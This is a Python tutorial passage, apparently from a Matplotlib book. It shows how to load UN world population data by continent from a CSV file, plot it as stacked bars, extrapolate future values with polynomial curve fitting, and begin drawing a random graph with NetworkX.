Now that we have a way to seamlessly play two (or more) music tracks together, I wanted to create a simple component that could automatically play music just like Brennan provided it. Using this script, it should be about as easy to setup your music as it would have been if it were a single file. Add a new script called MusicPlayer and copy the following:
using UnityEngine; using System.Collections; public class MusicPlayer : MonoBehaviour { public AudioClip introClip; public AudioClip loopClip; public AudioSequence sequence { get; private set; } void Start () { sequence = gameObject.AddComponent<AudioSequence>(); sequence.Play(introClip, loopClip); AudioSequenceData data = sequence.GetData(loopClip); data.source.loop = true; } }
Now we just need to incorporate this script and the music assets into our game:
- Import the music into your project.
- Set the “Load Type” for both assets to be Streaming. This will help keep memory requirements lower and is a good idea for all music.
- Open the Battle scene.
- Add a child game object to the Battle Controller called Music.
- Add the MusicPlayer component to the Music game object.
- In the inspector, assign the Intro Clip to use the Strategy RPG Battle_Intro asset.
- In the inspector, assign the Loop Clip to use the Strategy RPG Battle_Loop asset.
- Press play and enjoy the new music!
Extra
As a side note, if you use an audio mixer (new in Unity 5), you can globally adjust the volume or audio effects of any audio source that uses it. This setup requires little more than an exposed parameter and a UI script on your canvas to modify it – be sure to check out Unity’s nice video tutorials that show how. This solves most if not all of my other needs for an Audio Controller such as knowing when to mute or change volume for music and or sound fx.
Summary
In this post we provided several reusable components related to audio and music in particular. First we created a new Tweener to allow us to programmatically fade in or out music using any specified volume, duration and animation curve we desire. Then we created a script which tracked the playback of an audio source via a couroutine so that you could get callbacks for audio based events like when it begins playing, stops playing, loops or completes. Finally we created a system that could allow us to play a sequence of audioclips without any gaps – perfect for playing the new music assets that we added to the project.
All of these scripts are “fresh” (read as “not battle tested” or “use at your own risk”) but should provide a helpful starting point at a minimum. If you find any bugs let me know and I’ll attempt to fix it.
Don’t forget that the project repository is available online here. If you ever have any trouble getting something to compile, or need an asset, feel free to use this resource.
10 thoughts on “Tactics RPG Music”
Followed everything to the point, and everything seems like it should be working, however, I come across two problems when starting the battle scene. I get two errors. One is
NullReferenceException: Object reference not set to an instance of an object
UnitFactory.AddJob (UnityEngine.GameObject obj, System.String name) (at Assets/Scripts/Factory/UnitFactory.cs:65)
the other error i get is
No Prefab for name: Jobs/Warrior
UnityEngine.Debug:LogError(Object)
Any idea where I went wrong..I am at the end of the tutorial and everything seems like it should be great. but I cant figure this out.
Have you completed the step to use the file menu and choose “Pre Production->Parse Jobs”?
Oh man, I’ve been following all of this project for the past month.
At times it has been hard to digest, since I am not entirely a programmer, things about pattern design and architecture are sometimes hard for me to understand at the beginning why things are being done that way.
But things are okay now, and I have understood in general how things are structured so that I can modify it further.
I want to thank you so much for this, these tutorials have a lot of value for me.
I had wanted to make a tactics game for a long time, and your work helped me have this basis of tools to focus on the design and the particular implementation details of the game I want to make.
Thanks a lot.
Awesome, glad to hear you stuck to it and made it through ok! Good luck on your game!
Thank you so much for this great tutorial! Can I ask a stupid question at this point (this is the first tutorial I learned about Unity)?
Right now, all we learned is in one scene. If we want to create a game with multiple levels, do we create an independent scene for each level? For example, after finish the battle of the first level in one scene, we enter the second scene for the second level. If yes, how do we transfer from one scene to another? Could you please recommend a tutorial?
Thank you again!
Wow, I’m impressed that you made it through my Tactics RPG series as your first tutorial 🙂
You are correct that many games will use scenes to change levels. You will use the SceneManager for this purpose, so you can read the documentation at that link or google search that name and you will find some tutorials pretty quick.
Is there a download link to try out the full game and not just the demo?
I made this project as a hobbyist, for fun, and as a learning exercise for myself and my readers. Making a full Tactics RPG would require more than I can do by myself – the art requirements alone are daunting, not to mention the rest of the programming, music and sound fx, story writing, game design, marketing, etc. I never turned this project into a full game, I was satisfied feeling like I had an “engine” for one. Of course, the project was inspired by “Final Fantasy Tactics”, so feel free to play any of those if you want more!
Ah okay I understand. It was fun following through the tutorial so I just wanted to know if you made it an actual app, etc. If you wanted to change the stats of the jobs for example HP to 1000 from 32 would you just change the JobStats.csv or would I have to call a separate method like SetValue each time I wanted to change the stats.
I’m glad you enjoyed it! Regarding the stats, it depends on what you are trying to accomplish. Setting stats via the csv was meant to provide an easy way to design/balance the game – you update your stats here because you can see them all in a table so you can easily compare and tweak to your hearts content. If you wanted to design the base values of characters to have a much larger HP range then you could do that here.
After the game has been configured, I might use in-game code for extra variance, special conditions, or to modify stats as gameplay progresses. Does that help?
|
https://theliquidfire.com/2016/12/12/tactics-rpg-music/
|
CC-MAIN-2021-10
|
refinedweb
| 4,006
| 53.61
|
I've written hundreds of projects inside of the Borland and Turbo C IDEs and have never encountered this problem.
I'm trying to write a small game in DJGPP. I have several source files that I'm including in my project. They are not libraries yet, they are pure source - this allows me to modify them easily during development.
Here is my problem.
Project window looks like this:Project window looks like this:Code:
#include "svga.h"
int main(void)
{
SVGASys<COLOR16> Video;
Video.SetMode(0x111);
return 0;
}
- svga.cpp
- test.cpp (the test file - see above)
- keyboard.cpp
COLOR16 is typedef as unsigned short
This template class allows me to use the same class for all video modes and all bit depths.
DJGPP tells me that SVGASys<unsigned short>::SetMode() is an undefined reference. But this is hogwash because it is declared in the svga.h header file and it is defined in the svga.cpp file which is part of my project.
Now what is odd is that i'm also including my keyboard handler source code as well. Now for some reason, this code works and does not give me an undefined reference
This works. So DJGPP is finding StartKeyboard in keyboard.h and is also linking with keyboard.cpp to create the final thing.This works. So DJGPP is finding StartKeyboard in keyboard.h and is also linking with keyboard.cpp to create the final thing.Code:
#include "keyboard.h"
#include "svga.h"
int main(void)
{
StartKeyboard();
StopKeyboard();
return 0;
}
My question. Why on God's green earth does the first one not work but the second one does?
Incidentally if I place the main() inside of svga.cpp to test out the functions (outside of the project), it works perfect. But this seems to only work outside of a project and only on single file programs.
Theoretically if it is not linking right, then neither the keyboard example nor the SVGA example should work since the linker would not be able to find either source file. Something is seriously wrong because the keyboard example works, but the SVGA one does not. But like I said, I know my template class works because it will work when I place main() inside of the svga.cpp file.
I've tried to delete all of the .o files relating to this project and still no go. This is probably the same reason that RHIDE gives me the same error when trying to call a function in a NASM source file that is in the project.
All these files are in the DJGPP directory, but I've also tried it by creating a project in another directory. Neither method works.
|
https://cboard.cprogramming.com/brief-history-cprogramming-com/18461-djgpp-project-problems-printable-thread.html
|
CC-MAIN-2017-30
|
refinedweb
| 452
| 76.82
|
Our server will be implemented in the Python language. In this section, we will go through the script line by line, explaining each as we go along; you can type it in the file or download it from the repository.
So, let's open the
MyToolboxServer.py file and go through its contents.
At the beginning, we need to import files that are necessary for the script to run:
import sys, glob # path for file generated by Apache Thrift Compiler sys.path.append('gen-py') # add path where built Apache Thrift libraries are sys.path.insert(0, glob.glob('thrift-0.9.2/lib/py/build/lib.*')[0])
These are the modules in the
gen-py directory and the
thrift-0.9.2 directory (the name depends on the exact Apache Thrift version you use).
No credit card required
|
https://www.oreilly.com/library/view/learning-apache-thrift/9781785882746/ch07s06.html
|
CC-MAIN-2019-35
|
refinedweb
| 139
| 75.3
|
Reminder : You can find all the DarkRift2 related articles here
You can find the entire project on my official GitHub
This article deals with the client implementation within Unity 3D. Here are the steps we’ll accomplish :
- Create the client scene
- Create the DarkRift2 client game object
- Load the main game scene
- Try to connect to the server (built on the last article)
Create the client scene
Open the project and create a new scene called “MainClientScene“. As for the server, we can delete the camera because the camera is contained on the MainGameScene.
Create a new GameObject “ClientManager” in the hierarchy :
Add a new component Client wich is the official DarkRift2 client :
The DarkRift2 Client
By adding the component on the GameObject, you saw that there is a lot of properties. Let’s talk about them :
- Adress : IP adress of the DarkRift2 Server (127.0.0.1 is the lookup adress wich reference the current machine)
- Port : Port number of the server
- IPVersion : You can choose between IPV4 or IPV6
- InvokeFromDispatcher : As you know, there is a dispatcher. You can invoke from it
- SniffData : Print all messages into the console
- Cache : Some settings to adjust for the cache system
For the tutorial, we can let it like that because the server we ran in the last article had this adress : 127.0.0.1:4296
Create a custom ClientManager
As for the server again, we’ll create a new script in the Network folder called ClientManager. It will handle our logic for our game regarding the client (What to do on connection, disconnect, …)
Create the ClientManager and add it to the GameObject ClientManager. For now, we just need a reference to the Client (DarkRift2).
First of all, you need to download my Utilies in order to use the script MonoBehaviourSingletonPersistent wich when is inherited, it implements the Singleton pattern. Persistent means that it doesn’t destroy on load.
Here is the link :
Then, you can write the following code for the ClientManager :
using DarkRift.Client.Unity; using UnityEngine; using UnityEngine.SceneManagement; public class ClientManager : MonoBehaviourSingletonPersistent<ClientManager> { #region Properties /// <summary> /// Reference to the DarkRift2 client /// </summary> public UnityClient clientReference; #endregion #region Unity Callbacks private void Awake() { base.Awake(); ////////////////// /// Properties initialization clientReference = GetComponent<UnityClient>(); } // Start is called before the first frame update void Start() { ////////////////// /// Load the game scene SceneManager.LoadScene("MainGameScene", LoadSceneMode.Additive); } #endregion }
Don’t forget to use the DarkRift.Client.Unity namespace !
Try the client connection
All is ready to be tested, do you think that we can lauch the client right now ? Maybe.. let’s try :
Seems to work. The MainGameScene is correctly loaded but if you look at the console window, you will notice that there is an error. The client cannot connect to the server.
This error occurs only if the server is unreachable. In my case (and maybe yours) i don’t have launched the server before lauching the client. Of course, it’s basic. If the client need to connects to the server, the server must be turned on before the client try to connect.
Start the server with the build we made on the last article and try to restart the client.
We did it right. The clients succeded to connect to the server. And if you go back to the server windows process, you will notice that the server displayed a message :
Yes, it informs you that a new client has connected ! Perfect, isn’t it ? …. but, wait… is the ball synchronized ?
Of course not ! we’ve just handle the client connection. We havn’t send any message to client about the ball position… And the client doesn’t know read message from the server for now.
What’s next ?
On the next article, we’ll explain how we can synchronize object of the MainGameScene and how we will do it… a lot of work is waiting for us but we are on the good way !
Thanks for reading.
|
http://materiagame.com/2019/02/10
|
CC-MAIN-2019-30
|
refinedweb
| 657
| 62.27
|
django.contrib.humanize is a set of Django template filters that adds human touch to data. It provides naturalday filter that formats date to ‘yesterday’, ‘today’ or ‘tomorrow’ when applicable.
A similar requirement which the humanize pacakge does not address is to display time difference with this human touch. so here is a snippet that does so.
2 thoughts on “Humanizing the time difference ( in django )”
Hi Anand,
Thanks for sharing naturalTimeDifference(). I made two changes to improve your code, feel free to share with others. First, if the filter is passed a datetime.timedelta object it uses that instead of calculating datetime.now() – value. Second, with one additional conditional it now says “1 hour ago” for (7200 > delta.seconds >= 3600) and “N hours ago” for delta >= 7200. Small changes for a grammatically correct result.
Here is the updated filter code:
def naturalTimeDifference(value):
“””
Finds the difference between the datetime value given and now()
and returns appropriate humanize form
“””
from datetime import datetime, timedelta
if isinstance(value, timedelta):
delta = value
elif isinstance(value, datetime):
delta = datetime.now() – value
else:
delta = None
if delta:
if delta.days > 6:
return value.strftime(“%b %d”) # May 15
if delta.days > 1:
return value.strftime(“%A”) # Wednesday
elif delta.days == 1:
return ‘yesterday’ # yesterday
elif delta.seconds >= 7200:
return str(delta.seconds / 3600 ) + ‘ hours ago’ # 3 hours ago
elif delta.seconds >= 3600:
return ‘1 hour ago’ # 1 hour ago
elif delta.seconds > MOMENT:
return str(delta.seconds/60) + ‘ minutes ago’ # 29 minutes ago
else:
return ‘a moment ago’ # a moment ago
return defaultfilters.date(value)
else:
return str(value)
Hi, now with Django 1.4 and time zone support you need to replace
datetime.utcnow() - value
with
delta = timezone.now() - value
where ‘timezone’ is imported with
from django.utils import timezone
|
https://anandnalya.com/2009/05/humanizing-the-time-difference-in-django/
|
CC-MAIN-2020-40
|
refinedweb
| 297
| 61.83
|
Important changes to forums and questions
All forums and questions are now archived. To start a new conversation or read the latest updates go to forums.mbed.com.
2 years, 3 months ago.
How to end an event queue?
I would like to create an event queue, and then call a function ever 2 seconds for a total of 10 seconds (so likely 5 times), and then for the queue to stop executing the function. So a temporary event, but called every certain amount of time. I've tried this:
void handler(int c) { com.printf("Param: %d\r\n", c); } int main() { EventQueue queue; int id = queue.call_every(2000,handler, 5); queue.dispatch(); wait(10); queue.break_dispatch(); queue.cancel(id); while (1) { } }
But the function doesn't stop executing.
How can I stop the function from executing after some time x?
2 Answers
2 years, 3 months ago.
Hi there,
from my point of view your code not working because after you call the dispatch method without an argument, your code is blocked in indefinitely loop.
Dispatch
void handler(int c) { printf("Param: %d\r\n", c);} int main() { printf("Start\n"); EventQueue queue; int id = queue.call_every(2000,handler, 5); queue.dispatch(10000); while (1) {myled = !myled; wait(0.5);} }
I do not know if these ways are correct but function will stop/pause
Cancel
void handler(int c) { printf("Param: %d\r\n", c); } int main() { printf("Start\n"); EventQueue queue; Thread t; t.start(callback(&queue, &EventQueue::dispatch_forever)); int id = queue.call_every(2000,handler, 5); wait(10); queue.cancel(id); while (1) {myled = !myled; wait(0.5); } }
Pause
#include "mbed.h" DigitalOut myled(LED1); EventQueue queue; Thread t; InterruptIn mybutton(USER_BUTTON); volatile bool ispressed = true; void pressed(){ispressed = !ispressed;} void handler(int c) { if(ispressed == true){ printf("Param: %d\r\n", c); } } int main() { printf("Start\n"); mybutton.rise(callback(pressed)); t.start(callback(&queue, &EventQueue::dispatch_forever)); int id = queue.call_every(2000,handler, 5); while (1) {myled = !myled; wait(0.5);} }
and so on.
Best regards
J.
2 years, 3 months ago.
Instead of queue.call_every() use queue.call_in(), this schedules it just one time. Then reschedule it as many times as you want, and stop when needed. The function can even schedule itself if it has access to the EventQueue object.
|
https://os.mbed.com/questions/86071/How-to-end-an-event-queue/
|
CC-MAIN-2021-39
|
refinedweb
| 386
| 70.6
|
On Wed, 2006-08-02 at 17:41 -0400, Sven Willenberger wrote: > On Wed, 2006-08-02 at 10:25 -0700, Matthew Dillon wrote: > > Please try this patch and tell me if it works. I think we have an issue > > when one process holds an exclusive lock while 2 or more processes are > > trying to get a shared lock, or vise-versa. > > > > -Matt > > > > Index: kern_lockf.c > > =================================================================== > > RCS file: /cvs/src/sys/kern/kern_lockf.c,v > > retrieving revision 1.32 > > diff -u -r1.32 kern_lockf.c > > --- kern_lockf.c 25 Jul 2006 20:01:50 -0000 1.32 > > +++ kern_lockf.c 2 Aug 2006 17:23:56 -0000 > > @@ -772,8 +772,10 @@ > > TAILQ_REMOVE(&lock->lf_blocked, range, lf_link); > > range->lf_flags = 1; > > wakeup(range); > > +#if 0 > > if (range->lf_start >= start && range->lf_end <= end) > > break; > > +#endif > > } > > } > > > > I have applied the patch (and recompiled) and am letting the system run > full steam right now (including the milter, etc); the initial results > look promising as it has not exhibited the aberrant behavior as of yet. > I will post a followup after letting this run all night (assuming it > does so) or after it fails (which hopefully won't happen). > > Sven > As a followup, the server has been running without a hitch now for 18 hours so it would appear that the above patch has fixed the situation, unless some other more rare situation/condition crops up that would cause this lock. Sven
|
http://leaf.dragonflybsd.org/mailarchive/bugs/2006-08/msg00012.html
|
CC-MAIN-2015-06
|
refinedweb
| 234
| 68.1
|
A simple solution to the sequence search problems is the linear search algorithm, which is also known as a sequential search algorithm. In this article, I will tell you how to create a linear search algorithm with python.
How Linear Search Algorithm Works?
The linear search algorithm iterates through the sequence one item at a time until the specific item is found or all items have been examined. In Python, a target element can be found in a sequence using the in operator:
Also, Read – Proximity Analysis with Python.
Code language: PHP (php)Code language: PHP (php)
if key in theArray : print( "The key is in the array." ) else : print( "The key is not in the array." )
Using the in operator makes our code simple and easy to read, but it hides the inner workings. Below, the in operator is implemented as a linear search.
Consider the unsorted 1-D array of integer values shown in the figure above. To determine if the value 31 is in the array, the search begins with the value of the first element. Since the first element does not contain the target value, the next element in sequential order is compared to the value 31. This process is repeated until the element is found in the sixth position.
But, what if the desired item is not in the array? For example, suppose we want to find the value 8 in the example table. The search begins at the first entry as before, but this time each element in the array is compared to the target value. It cannot be determined that the value is not in sequence until the entire array has been traversed, as shown in the figure above.
Finding a Specific Item using Linear Search Algorithm
The function in the figure above implements the linear search algorithm, which results in a Boolean value indicating the success or failure of the search. This is the same operation performed by the in operator.
A count-controlled loop is used to cycle through the sequence in which each element is compared to the target value. If the element is in the sequence, the loop is terminated and True is returned. Otherwise, a full scan is taken and False is returned after the loop ends.
Searching on an Unsorted Sequence:
Code language: PHP (php)Code language: PHP (php)
def linearSearch(theValues, target): n = len(theValues) for i in range(n): # if the target is in the ith element, return True if theValues[i] == target: return True return False
To analyze the linear search algorithm for the worst case, we must first determine which conditions constitute the worst case. Remember that the worst-case happens when the algorithm performs the maximum number of steps.
For a linear search, this happens when the target element is not in the sequence and the loop iterates through the entire sequence. Assuming the sequence contains n elements, the linear search has a worst-case time of O(n).
Searching on a Sorted Sequence
A linear search algorithm can also be performed on a sorted sequence, which is a sequence containing values in a specific order. A linear search algorithm on a sorted sequence works in the same way it does for an unsorted sequence, with only one exception. It is possible to terminate the search prematurely when the value is not in the sequence instead of always having to perform a full scan.
Code language: PHP (php)Code language: PHP (php)
def sortedLinearSearch(theValues, item): n = len(theValues) for i in range(n): # if the target is found in ith element, return True if theValues[i] == item: return True # if target is larger than the ith item, it's not in the sequence elif theValues[i] > item: return False return False
So this is how we can implement a linear search with python. It is a part of Data Structures and Algorithms which is one of the most important topics in any field of Programming.
Also, Read – Interactive Maps with Python.
I hope you liked this article on Linear Search Algorithm with Python. Feel free to ask your valuable questions in the comments section below. You can also follow me on Medium to learn every topic of Python and Machine Learning.
|
https://thecleverprogrammer.com/2020/09/10/linear-search-algorithm-with-python/
|
CC-MAIN-2021-43
|
refinedweb
| 710
| 59.84
|
Plotting data from a CSV file
A common format to export and distribute datasets is the Comma-Separated Values (CSV) format. For example, spreadsheet applications allow us to export a CSV from a working sheet, and some databases also allow for CSV data export. Additionally, it's a common format to distribute datasets on the Web.
In this example, we'll be plotting the evolution of the world's population divided by continents, between 1950 and 2050 (of course they are predictions), using a new type of graph: bars stacked.
Using the data available at (that fetches data from the official UN data at), we have prepared the following CSV file:
Continent,1950,1975,2000,2010,2025,2050
Africa,227270,418765,819462,1033043,1400184,1998466
Asia,1402887,2379374,3698296,4166741,4772523,5231485
Europe,547460,676207,726568,732759,729264,691048
Latin America,167307,323323,521228,588649,669533,729184
Northern America,171615,242360,318654,351659,397522,448464
Oceania,12807,21286,31160,35838,42507,51338
In the first line, we can find the header with a description of what the data in the columns represent. The other lines contain the continent's name and its population (in thousands) for the given years.
In the first line, we can find the header with a description of what the data in the columns represent. The other lines contain the continent's name and its population (in thousands) for the given years.
There are several ways to parse a CSV file, for example:
- NumPy's loadtxt() (what we are going to use here)
- Matplotlib's mlab.csv2rec()
- The csv module (in the standard library)
but we decided to go with loadtxt() because it's very powerful (and it's what Matplotlib is standardizing on).
Let's look at how we can plot it then:
# for file opening made easier
from __future__ import with_statement
We need this because we will use the with statement to read the file.
# numpy
import numpy as np
NumPy is used to load the CSV and for its useful array data type.
# matplotlib plotting module
import matplotlib.pyplot as plt
# matplotlib colormap module
import matplotlib.cm as cm
# needed for formatting Y axis
from matplotlib.ticker import FuncFormatter
# Matplotlib font manager
import matplotlib.font_manager as font_manager
In addition to the classic pyplot module, we need other Matplotlib submodules:
- cm (color map): Considering the way we're going to prepare the plot, we need to specify the color map of the graphical elements
- FuncFormatter: We will use this to change the way the Y-axis labels are displayed
- font_manager: We want to have a legend with a smaller font, and font_manager allows us to do that
def billions(x, pos):
"""Formatter for Y axis, values are in billions"""
return '%1.fbn' % (x*1e-6)
This is the function that we will use to format the Y-axis labels. Our data is in thousands. Therefore, by dividing it by one million, we obtain values in the order of billions. The function is called at every label to draw, passing the label value and the position.
# bar width
width = .8
As said earlier, we will plot bars, and here we defi ne their width.
The following is the parsing code. We know that it's a bit hard to follow (the data preparation code is usually the hardest one) but we will show how powerful it is.
# open CSV file
with open('population.csv') as f:
The function we're going to use, NumPy loadtxt(), is able to receive either a filename or a file descriptor, as in this case. We have to open the file here because we have to strip the header line from the rest of the file and set up the data parsing structures.
# read the first line, splitting the years
years = map(int, f.readline().split(',')[1:])
Here we read the first line, the header, and extract the years. We do that by calling the split() function and then mapping the int() function to the resulting list, from the second element onwards (as the first one is a string).
# we prepare the dtype for exacting data; it's made of:
# <1 string field> <len(years) integers fields>
dtype = [('continents', 'S16')] + [('', np.int32)]*len(years)
NumPy is flexible enough to allow us to define new data types. Here, we are creating one ad hoc for our data lines: a string (of maximum 16 characters) and as many integers as the length of years list. Also note how the fi rst element has a name, continents, while the last integers have none: we will need this in a bit.
# we load the file, setting the delimiter and the dtype above
y = np.loadtxt(f, delimiter=',', dtype=dtype)
With the new data type, we can actually call loadtxt(). Here is the description of the parameters:
- f: This is the file descriptor. Please note that it now contains all the lines except the first one (we've read above) which contains the headers, so no data is lost.
- delimiter: By default, loadtxt() expects the delimiter to be spaces, but since we are parsing a CSV file, the separator is comma.
- dtype: This is the data type that is used to apply to the text we read. By default, loadtxt() tries to match against float values
# "map" the resulting structure to be easily accessible:
# the first column (made of string) is called 'continents'
# the remaining values are added to 'data' sub-matrix
# where the real data are
y = y.view(np.dtype([('continents', 'S16'),
('data', np.int32, len(years))]))
Here we're using a trick: we view the resulting data structure as made up of two parts, continents and data. It's similar to the dtype that we defined earlier, but with an important difference. Now, the integer's values are mapped to a field name, data. This results in the column continents with all the continents names,and the matrix data that contains the year's values for each row of the file.
data = y['data']
continents = y['continents']
We can separate the data and the continents part into two variables for easier usage in the code.
# prepare the bottom array
bottom = np.zeros(len(years))
We prepare an array of zeros of the same length as years. As said earlier, we plot stacked bars, so each dataset is plot over the previous ones, thus we need to know where the bars below finish. The bottom array keeps track of this, containing the height of bars already plotted.
# for each line in data
for i in range(len(data)):
Now that we have our information in data, we can loop over it.
# create the bars for each element, on top of the previous bars
bt = plt.bar(range(len(data[i])), data[i], width=width,
color=cm.hsv(32*i), label=continents[i],
bottom=bottom)
and create the stacked bars. Some important notes:
- We select the the i-th row of data, and plot a bar according to its element's size (data[i]) with the chosen width.
- As the bars are generated in different loops, their colors would be all the same. To avoid this, we use a color map (in this case hsv), selecting a different color at each iteration, so the sub-bars will have different colors.
- We label each bar set with the relative continent's name (useful for the legend)
- As we have said, they are stacked bars. In fact, every iteration adds a piece of the global bars. To do so, we need to know where to start drawing the bar from (the lower limit) and bottom does this. It contains the value where to start drowing the current bar.
# update the bottom array
bottom += data[i]
We update the bottom array. By adding the current data line, we know what the bottom line will be to plot the next bars on top of it.
# label the X ticks with years
plt.xticks(np.arange(len(years))+width/2,
[int(year) for year in years])
We then add the tick's labels, the years elements, right in the middle of the bar.
# some information on the plot
plt.xlabel('Years')
plt.ylabel('Population (in billions)')
plt.title('World Population: 1950 - 2050 (predictions)')
Add some information to the graph.
# draw a legend, with a smaller font
plt.legend(loc='upper left',
prop=font_manager.FontProperties(size=7))
We now draw a legend in the upper-left position with a small font (to better fit the empty space).
# apply the custom function as Y axis formatter
plt.gca().yaxis.set_major_formatter(FuncFormatter(billions)
Finally, we change the Y-axis label formatter, to use the custom formatting function that we defined earlier.
The result is the next screenshot where we can see the composition of the world population divided by continents:
In the preceding screenshot, the whole bar represents the total world population, and the sections in each bar tell us about how much a continent contributes to it. Also observe how the custom color map works: from bottom to top, we have represented Africa in red, Asia in orange, Europe in light green, Latin America in green, Northern America in light blue, and Oceania in blue (barely visible as the top of the bars).
Plotting extrapolated data using curve fitting
While plotting the CSV values, we have seen that there were some columns representing predictions of the world population in the coming years. We'd like to show how to obtain such predictions using the mathematical process of extrapolation with the help of curve fitting.
Curve fitting is the process of constructing a curve (a mathematical function) that better fits to a series of data points.
This process is related to other two concepts:
- interpolation: A method of constructing new data points within the range of a known set of points
- extrapolation: A method of constructing new data points outside a known set of points
The results of extrapolation are subject to a greater degree of uncertainty and are influenced a lot by the fitting function that is used.
So it works this way:
- First, a known set of measures is passed to the curve fitting procedure that computes a function to approximate these values
- With this function, we can compute additional values that are not present in the original dataset
Let's first approach curve fitting with a simple example:
# Numpy and Matplotlib
import numpy as np
import matplotlib.pyplot as plt
These are the classic imports.
# the known points set
data = [[2,2],[5,0],[9,5],[11,4],[12,7],[13,11],[17,12]]
This is the data we will use for curve fitting. They are the points on a plane (so each has a X and a Y component)
# we extract the X and Y components from previous points
x, y = zip(*data)
We aggregate the X and Y components in two distinct lists.
# plot the data points with a black cross
plt.plot(x, y, 'kx')
Then plot the original dataset as a black cross on the Matplotlib image.
# we want a bit more data and more fine grained for
# the fitting functions
x2 = np.arange(min(x)-1, max(x)+1, .01)
We prepare a new array for the X values because we wish to have a wider set of values (one unit on the right and one on to the left of the original list) and a fine grain to plot the fitting function nicely.
# lines styles for the polynomials
styles = [':', '-.', '--']
To differentiate better between the polynomial lines, we now define their styles list.
# getting style and count one at time
for d, style in enumerate(styles):
Then we loop over that list by also considering the item count.
# degree of the polynomial
deg = d + 1
We define the actual polynomial degree.
# calculate the coefficients of the fitting polynomial
c = np.polyfit(x, y, deg)
Then compute the coefficients of the fitting polynomial whose general format is:
c[0]*x**deg + c[1]*x**(deg – 1) + ... + c[deg]
# we evaluate the fitting function against x2
y2 = np.polyval(c, x2)
Here, we generate the new values by evaluating the fitting polynomial against the x2 array.
# and then we plot it
plt.plot(x2, y2, label="deg=%d" % deg, linestyle=style)
Then we plot the resulting function, adding a label that indicates the degree of the polynomial and using a different style for each line.
# show the legend
plt.legend(loc='upper left')
We then show the legend, and the final result is shown in the next screenshot:
Here, the polynomial with degree=1 is drawn as a dotted blue line, the one with degree=2 is a dash-dot green line, and the one with degree=3 is a dashed red line.
We can see that the higher the degree, the better is the fit of the function against the data.
Let's now revert to our main intention, trying to provide an extrapolation for population data. First a note: we take the values for 2010 as real data and not predictions (well, we are quite near to that year) else we have very few values to create a realistic extrapolation.
Let's see the code:
# for file opening made easier
from __future__ import with_statement
# numpy
import numpy as np
# matplotlib plotting module
import matplotlib.pyplot as plt
# matplotlib colormap module
import matplotlib.cm as cm
# Matplotlib font manager
import matplotlib.font_manager as font_manager
# bar width
width = .8
# open CSV file
with open('population.csv') as f:
# read the first line, splitting the years
years = map(int, f.readline().split(',')[1:])
# we prepare the dtype for exacting data; it's made of:
# <1 string field> <6 integers fields>
dtype = [('continents', 'S16')] + [('', np.int32)]*len(years)
# we load the file, setting the delimiter and the dtype above
y = np.loadtxt(f, delimiter=',', dtype=dtype)
# "map" the resulting structure to be easily accessible:
# the first column (made of string) is called 'continents'
# the remaining values are added to 'data' sub-matrix
# where the real data are
y = y.view(np.dtype([('continents', 'S16'),
('data', np.int32, len(years))]))
# extract fields
data = y['data']
continents = y['continents']
This is the same code that is used for the CSV example (reported here for completeness).
x = years[:-2]
x2 = years[-2:]
We are dividing the years into two groups: before and after 2010. This translates to split the last two elements of the years list.
What we are going to do here is prepare the plot in two phases:
- First, we plot the data we consider certain values
- After this, we plot the data from the UN predictions next to our extrapolations
# prepare the bottom array
b1 = np.zeros(len(years)-2)
We prepare the array (made of zeros) for the bottom argument of bar().
# for each line in data
for i in range(len(data)):
# select all the data except the last 2 values
d = data[i][:-2]
For each data line, we extract the information we need, so we remove the last two values.
# create bars for each element, on top of the previous bars
bt = plt.bar(range(len(d)), d, width=width,
color=cm.hsv(32*(i)), label=continents[i],
bottom=b1)
# update the bottom array
b1 += d
Then we plot the bar, and update the bottom array.
# prepare the bottom array
b2_1, b2_2 = np.zeros(2), np.zeros(2)
We need two arrays because we will display two bars for the same year—one from the CSV and the other from our fitting function.
# for each line in data
for i in range(len(data)):
# extract the last 2 values
d = data[i][-2:]
Again, for each line in the data matrix, we extract the last two values that are needed to plot the bar for CSV.
# select the data to compute the fitting function
y = data[i][:-2]
Along with the other values needed to compute the fitting polynomial.
# use a polynomial of degree 3
c = np.polyfit(x, y, 3)
Here, we set up a polynomial of degree 3; there is no need for higher degrees.
# create a function out of those coefficients
p = np.poly1d(c)
This method constructs a polynomial starting from the coefficients that we pass as parameter.
# compute p on x2 values (we need integers, so the map)
y2 = map(int, p(x2))
We use the polynomial that was defined earlier to compute its values for x2. We also map the resulting values to integer, as the bar() function expects them for height.
# create bars for each element, on top of the previous bars
bt = plt.bar(len(b1)+np.arange(len(d)), d, width=width/2,
color=cm.hsv(32*(i)), bottom=b2_1)
We draw a bar for the data from the CSV. Note how the width is half of that of the other bars. This is because in the same width we will draw the two sets of bars for a better visual comparison.
# create the bars for the extrapolated values
bt = plt.bar(len(b1)+np.arange(len(d))+width/2, y2,
width=width/2, color=cm.bone(32*(i+2)),
bottom=b2_2)
Here, we plot the bars for the extrapolated values, using a dark color map so that we have an even better separation for the two datasets.
# update the bottom array
b2_1 += d
b2_2 += y2
We update both the bottom arrays.
# label the X ticks with years
plt.xticks(np.arange(len(years))+width/2,
[int(year) for year in years])
We add the years as ticks for the X-axis.
# draw a legend, with a smaller font
plt.legend(loc='upper left',
prop=font_manager.FontProperties(size=7))
To avoid a very big legend, we used only the labels for the data from the CSV, skipping the interpolated values. We believe it's pretty clear what they're referring to. Here is the screenshot that is displayed on executing this example:
The conclusion we can draw from this is that the United Nations uses a different function to prepare the predictions, especially because they have a continuous set of information, and they can also take into account other environmental circumstances while preparing such predictions.
Tools using Matplotlib
Given that it's has an easy and powerful API, Matplotlib is also used inside other programs and tools when plotting is needed. We are about to present a couple of these tools:
- NetworkX
- Mpmath
NetworkX
NetworkX () is a Python module that contains tools for creating and manipulating (complex) networks, also known as graphs.
A graph is defined as a set of nodes and edges where each edge is associated with two nodes. NetworkX also adds the possibility to associate properties to each node and edge.
NetworkX is not primarily a graph drawing package but, in collaboration with Matplotlib (and also with Graphviz), it's able to show the graph we're working on.
In the example we're going to propose, we will show how to create a random graph and draw it in a circular shape.
# matplotlib
import matplotlib.pyplot as plt
# networkx nodule
import networkx as nx
In addition to pyplot, we also import the networkx module.
# prepare a random graph with n nodes and m edges
n = 16
m = 60
G = nx.gnm_random_graph(n, m)
Here, we set up a graph with 16 nodes and 60 edges, chosen randomly from all the graphs with such characteristics. The graph returned is undirected: edges just connect two nodes, without a direction information (from node A to node B or vice versa).
# prepare a circular layout of nodes
pos = nx.circular_layout(G)
Then we are using a node positioning algorithm, particularly to prepare a circular layout for the nodes of our graphs; the returned variable pos is a 2D array of nodes' positions forming a circular shape.
# define the color to select from the color map
# as n numbers evenly spaced between color map limits
